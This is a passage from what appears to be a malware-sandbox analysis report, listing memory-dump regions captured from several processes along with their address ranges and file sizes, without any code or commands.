                                                                                                                                                                                                              • memory/3456-224-0x0000000005060000-0x0000000005061000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3456-235-0x0000000005010000-0x0000000005011000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3456-215-0x0000000000830000-0x0000000000831000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3520-286-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                136KB

                                                                                                                                                                                                              • memory/3520-359-0x0000000005820000-0x0000000005E26000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.0MB

                                                                                                                                                                                                              • memory/3556-289-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                136KB

                                                                                                                                                                                                              • memory/3556-346-0x0000000005570000-0x0000000005B76000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.0MB

                                                                                                                                                                                                              • memory/3868-251-0x00000000053B0000-0x00000000054FC000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                              • memory/4052-295-0x00000219966E0000-0x000002199672D000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                308KB

                                                                                                                                                                                                              • memory/4052-288-0x0000021996310000-0x0000021996312000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                8KB

                                                                                                                                                                                                              • memory/4052-291-0x0000021996310000-0x0000021996312000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                8KB

                                                                                                                                                                                                              • memory/4052-296-0x00000219967A0000-0x0000021996812000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                456KB

                                                                                                                                                                                                              • memory/4256-285-0x00000000042F0000-0x000000000434D000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                372KB

                                                                                                                                                                                                              • memory/4256-284-0x00000000044FC000-0x00000000045FD000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                              • memory/4472-298-0x000002D37A6B0000-0x000002D37A6B2000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                8KB

                                                                                                                                                                                                              • memory/4472-311-0x000002D378D80000-0x000002D378DF2000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                456KB

                                                                                                                                                                                                              • memory/4472-301-0x000002D37A6B0000-0x000002D37A6B2000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                8KB

                                                                                                                                                                                                              • memory/4540-313-0x000001695ACD0000-0x000001695AD42000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                456KB

                                                                                                                                                                                                              • memory/4540-299-0x000001695AAE0000-0x000001695AAE2000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                8KB

                                                                                                                                                                                                              • memory/4584-432-0x0000000000400000-0x00000000007BB000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.7MB

                                                                                                                                                                                                              • memory/4584-414-0x0000000002730000-0x0000000002731000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4584-412-0x00000000026B0000-0x00000000026B1000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4584-409-0x0000000002710000-0x0000000002711000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4584-395-0x0000000002460000-0x00000000024C0000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                384KB

                                                                                                                                                                                                              • memory/4584-422-0x00000000026E0000-0x00000000026E1000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4584-418-0x00000000026F0000-0x00000000026F1000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4584-403-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4584-427-0x0000000000400000-0x00000000007BB000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.7MB

                                                                                                                                                                                                              • memory/4584-425-0x0000000002750000-0x0000000002751000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4584-399-0x0000000002700000-0x0000000002701000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4644-431-0x0000000077640000-0x00000000777CE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                              • memory/4664-407-0x0000000004A90000-0x0000000004A91000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4736-433-0x0000000077640000-0x00000000777CE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                              • memory/5084-390-0x0000000000030000-0x0000000000033000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                12KB